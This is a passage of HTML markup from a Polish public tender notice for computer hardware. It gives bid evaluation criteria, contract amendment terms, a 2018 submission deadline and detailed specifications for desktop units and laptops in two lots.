id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>80,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin dostawy</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Wszelkie zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności. Umowa może ulec zmianie zgodnie z art. 144 ustawy PZP.2.	Zmiana umowy może dotyczyć:1)	zmiany przedmiotu zamówienia w przypadku gdy z powodu obiektywnych okoliczności, niezależnych od Wykonawcy nie będzie możliwe dostarczenie zaoferowanego przedmiotu umowy. Zamawiający dopuszcza (po uprzedniej akceptacji) dostarczenie sprzętu o właściwościach nie gorszych niż określone w umowie oraz o nie krótszym niż wymagany okresie gwarancji, za cenę nie wyższą niż cena przedmiotu pierwotnie zaoferowanego; 2)	zmiany wynagrodzenia spowodowanej zmianą ceny brutto produktu w przypadku ustawowej zmiany stawki podatku VAT jeżeli zmiany te będą mieć wpływ na wynagrodzenie;3)	zmiany terminu wykonania dostawy w przypadku przeszkód wynikających z wystąpienia siły wyższej (np. niemożliwych do przewidzenia utrudnień drogowych uniemożliwiających terminowe wykonanie dostawy wynikających z okoliczności niezależnych od Wykonawcy).3.	W razie wątpliwości, przyjmuje się, że nie stanowią zmiany Umowy następujące zmiany:1)	danych związanych z obsługą administracyjno-organizacyjną Umowy;2)	danych teleadresowych;3)	danych rejestrowych;4)	będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-10-11</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Część nr 1</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>JEDNOSTKA CENTRALNA - TYP I - 2 SZT.ProcesorTyp	Zgodny z x64 - dwurdzeniowy, taktowany zegarem co najmniej 3.7 GHz, pamięć cache co najmniej 3 MB lub procesor o równoważnej wydajności osiągający minimum 5470 punktów w teście PassMark - CPU Mark. Jeżeli osiągi zaoferowanego procesora nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście PassMark - CPU Mark.Dysk twardy	Typ dysku	HDDPojemność	Min. 1 TBPrędkość obrotowa	Min. 7200 obr/minTyp	SATAPamięćWielkość pamięci	Min. 8 GBRodzaj pamięci	DDR4Taktowanie	Min. 2400 MHzIlość banków pamięci	Min. 2 szt.Max. wielkość pamięci	Min. 16 GBKarta GraficznaTyp karty graficznej	Zintegrowana Intel HD Graphics 530 lub równoważna tzn, uzyskująca w rankingu Passmark G3D Mark wartość minimum 990. Jeżeli osiągi zaoferowanej karty graficznej nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście Passmark G3D Mark.MultimediaZintegrowana karta dźwiękowa	TakKomunikacjaKarta sieciowa LAN	10/100/1000 Mbit/sNapęd OptycznyRodzaj napędu	DVD-RWInterfejsy / KomunikacjaInterfejsy	HDMIVGA (15 pin D-Sub)RJ-45 (LAN)Audio (mikrofon, słuchawki, line-in, line-out)Porty USB	Min. 4 x USB 2.0 Type-AMin. 2 x USB 3.0 Type-AOprogramowanieSystem operacyjny	Microsoft Windows 10 Professional 64-bit PL lub równoważny - przez równoważność Zamawiający rozumie pełną funkcjonalność, jaką posiada wskazany system operacyjnyInneCzytnik kart pamięci	TakW zestawie	Klawiatura, Mysz  JEDNOSTKA CENTRALNA - TYP II - 2 SZT.ProcesorTyp	Zgodny z x64 - sześciordzeniowy, taktowany zegarem co najmniej 2.8 GHz, 4.0 GHz TurboBoost, pamięć cache co najmniej 9 MB lub procesor o równoważnej wydajności osiągający minimum 11670 punktów w teście PassMark - CPU Mark. Jeżeli osiągi zaoferowanego procesora nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście PassMark - CPU Mark.Dysk twardy	Typ dysku	HDDPojemność	Min. 1 TBPrędkość obrotowa	Min. 7200 obr/minTyp	SATAPamięćWielkość pamięci	Min. 8 GBRodzaj pamięci	DDR4Taktowanie	Min. 2400 MHzIlość banków pamięci	Min. 2 szt.Max. wielkość pamięci	Min. 32 GBKarta GraficznaTyp karty graficznej	Zintegrowana Intel UHD Graphics 630 lub równoważna tzn, uzyskująca w rankingu Passmark G3D Mark wartość minimum 1141. Jeżeli osiągi zaoferowanej karty graficznej nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście Passmark G3D Mark.MultimediaZintegrowana karta dźwiękowa	TakKomunikacjaKarta sieciowa LAN	10/100/1000 Mbit/sNapęd OptycznyRodzaj napędu	DVD-RWInterfejsy / KomunikacjaInterfejsy	HDMIVGA (15 pin D-Sub)RJ-45 (LAN)Audio (mikrofon, słuchawki, line-in, line-out)Porty USB	Min. 4 x USB 2.0 Type-AMin. 2 x USB 3.0 Type-AOprogramowanieSystem operacyjny	Microsoft Windows 10 Professional 64-bit PL lub równoważny - przez równoważność Zamawiający rozumie pełną funkcjonalność, jaką posiada wskazany system operacyjnyInneCzytnik kart pamięci	TakW zestawie	Klawiatura, Mysz <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30200000-1, 30210000-4, 30213300-8<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 30<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Zamówienie zostanie zrealizowane w terminie zgodnym z oświadczeniem zawartym w ofercie Wykonawcy, nie dłuższym niż: 30 dni. Przy czym termin realizacji powinien być wskazany w dniach (nie w godzinach, dobach itp.) i być nie krótszy niż 3 dni. <br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Część nr 2</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>KOMPUTER PRZENOŚNY - TYP I	- 1SZT.Procesor (rodzaj): Procesor klasy x64, 2 rdzeniowy, zaprojektowany do pracy w komputerach przenośnych, taktowany zegarem co najmniej 2.7 GHz , 3.5 GHz TurboBoost, pamięcią cache L3 co najmniej 4 MB lub równoważny wydajnościowo osiągający minimum 5120 punktów w teście PassMark - CPU Mark. Jeżeli osiągi zaoferowanego procesora nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście PassMark - CPU Mark.Matryca (przekątna) Od 15 do 16 caliMatryca (rozdzielczość) Min. 1920 x 1080 pikseliMatryca (powłoka) MatowaMatryca (typ)	TFT [LED]Pamięć zainstalowana (pojemność) Min. 8 GB Pamięć (technologia) 2133 MHz (DDR4)Rodzaj dysku twardego SSDPojemność dysku	Min. 256 GBNapęd optyczny	DVD-RWKarta graficzna (model) Zintegrowana Intel HD Graphics 620 lub równoważna tzn, uzyskująca w rankingu Passmark G3D Mark wartość minimum 920. Jeżeli osiągi zaoferowanej karty graficznej nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście Passmark G3D Mark.Dźwięk	Zintegrowana karta dźwiękowa Wbudowane głośniki stereoWbudowany mikrofonŁączność	BluetoothWi-Fi 802.11 a/b/g/n/acLAN 1 GbpsRodzaje wyjść / wejść	DC-in (wejście zasilania)VGA (15 pin D-Sub)HDMIRJ-45 (LAN)Min. 3 x USBWyjście słuchawkowe/wejście mikrofonoweCzytnik kart pamięci	TakKamera internetowa	TakDodatkowe informacje	Wydzielona klawiatura numerycznaSystem operacyjny	Microsoft Windows 10 Professional 64-bit PL lub równoważny - przez równoważność Zamawiający rozumie pełną funkcjonalność, jaką posiada wskazany system operacyjnyW zestawie Torba, mysz KOMPUTER PRZENOŚNY - TYP II	- 2SZT.Procesor (rodzaj): Procesor klasy x64, 4 rdzeniowy, zaprojektowany do pracy w komputerach przenośnych, taktowany zegarem co najmniej 1.6 GHz , 3.4 GHz TurboBoost, pamięcią cache L3 co najmniej 6 MB lub równoważny wydajnościowo osiągający minimum 7600 punktów w teście PassMark - CPU Mark. Jeżeli osiągi zaoferowanego procesora nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście PassMark - CPU Mark.Matryca (przekątna) Od 15 do 16 caliMatryca (rozdzielczość) Min. 1920 x 1080 pikseliMatryca (powłoka) Matowa Matryca (typ) Full-HD [LED]Pamięć zainstalowana (pojemność) Min. 8 GB Pamięć (technologia) 2400 MHz (DDR4)Maksymalna wielkość pamięci Min. 32 GBRodzaj dysku twardego HDDPojemność dysku	Min. 2 TBNapęd optyczny	DVD-RWKarta graficzna (model) Dedykowana karta graficzna AMD Radeon 530, posiadająca min. 2048 MB pamięci własnej lub równoważna tzn, uzyskująca w rankingu Passmark G3D Mark wartość minimum 1180. Jeżeli osiągi zaoferowanej karty graficznej nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście Passmark G3D Mark.Zintegrowana Intel UHD Graphics 620 lub równoważna tzn, uzyskująca w rankingu Passmark G3D Mark wartość minimum 1000. Jeżeli osiągi zaoferowanej karty graficznej nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście Passmark G3D Mark.Dźwięk	Zintegrowana karta dźwiękowa Wbudowane głośniki stereoWbudowany mikrofonŁączność	BluetoothWi-Fi 802.11 a/b/g/n/acLAN 1 GbpsRodzaje wyjść / wejść	DC-in (wejście zasilania)HDMIRJ-45 (LAN)Min. 1 x USB 2.0 Type-AMin. 2 x USB 3.1 Type-AMin. 1 x USB 3.1 Type-CWyjście słuchawkowe/wejście mikrofonoweCzytnik kart pamięci	TakKamera internetowa	TakDodatkowe informacje	Wydzielona klawiatura numerycznaSystem operacyjny	Microsoft Windows 10 Professional 64-bit PL lub równoważny - przez równoważność Zamawiający rozumie pełną funkcjonalność, jaką posiada wskazany system operacyjnyW zestawie Torba, mysz  KOMPUTER PRZENOŚNY - TYP III	- 1SZT.Procesor (rodzaj): Procesor klasy x64, 4 rdzeniowy, zaprojektowany do pracy w komputerach przenośnych, taktowany zegarem co najmniej 1.6 GHz , 3.4 GHz TurboBoost, pamięcią cache L3 co najmniej 6 MB lub równoważny wydajnościowo osiągający minimum 7600 punktów w teście PassMark - CPU Mark. Jeżeli osiągi zaoferowanego procesora nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście PassMark - CPU Mark.Matryca (przekątna) Od 13,5 do 14 caliMatryca (rozdzielczość) Min. 1920 x 1080 pikseliMatryca (powłoka) Matowa Matryca (typ)	TFT-TN Full-HD [LED]Pamięć zainstalowana (pojemność) Min. 8 GB Pamięć (technologia) 2400 MHz (DDR4)Maksymalna wielkość pamięci Min. 20 GBRodzaj dysku twardego SSDPojemność dysku	Min. 256 GBKarta graficzna (model) Zintegrowana Intel UHD Graphics 620 lub równoważna tzn, uzyskująca w rankingu Passmark G3D Mark wartość minimum 1000. Jeżeli osiągi zaoferowanej karty graficznej nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście Passmark G3D Mark.Dźwięk	Zintegrowana karta dźwiękowa Wbudowane głośniki stereoWbudowany mikrofonŁączność	BluetoothWi-Fi 802.11 a/b/g/n/acLAN 1 GbpsRodzaje wyjść / wejść	DC-in (wejście zasilania)HDMIVGA (15 pin D-Sub)RJ-45 (LAN)Min. 2 x USB 3.0 Type-AMin. 1 x USB 3.1 Type-CWyjście słuchawkowe/wejście mikrofonoweCzytnik kart pamięci	TakKamera internetowa	TakSystem operacyjny	Microsoft Windows 10 Professional 64-bit PL lub równoważny - przez równoważność Zamawiający rozumie pełną funkcjonalność, jaką posiada wskazany system operacyjnyW zestawie Torba, mysz KOMPUTER PRZENOŚNY - TYP IV	- 1SZT.Procesor (rodzaj): Procesor klasy x64, 4 rdzeniowy, zaprojektowany do pracy w komputerach przenośnych, taktowany zegarem co najmniej 1.6 GHz , 3.4 GHz TurboBoost, pamięcią cache L3 co najmniej 6 MB lub równoważny wydajnościowo osiągający minimum 7600 punktów w teście PassMark - CPU Mark. Jeżeli osiągi zaoferowanego procesora nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do 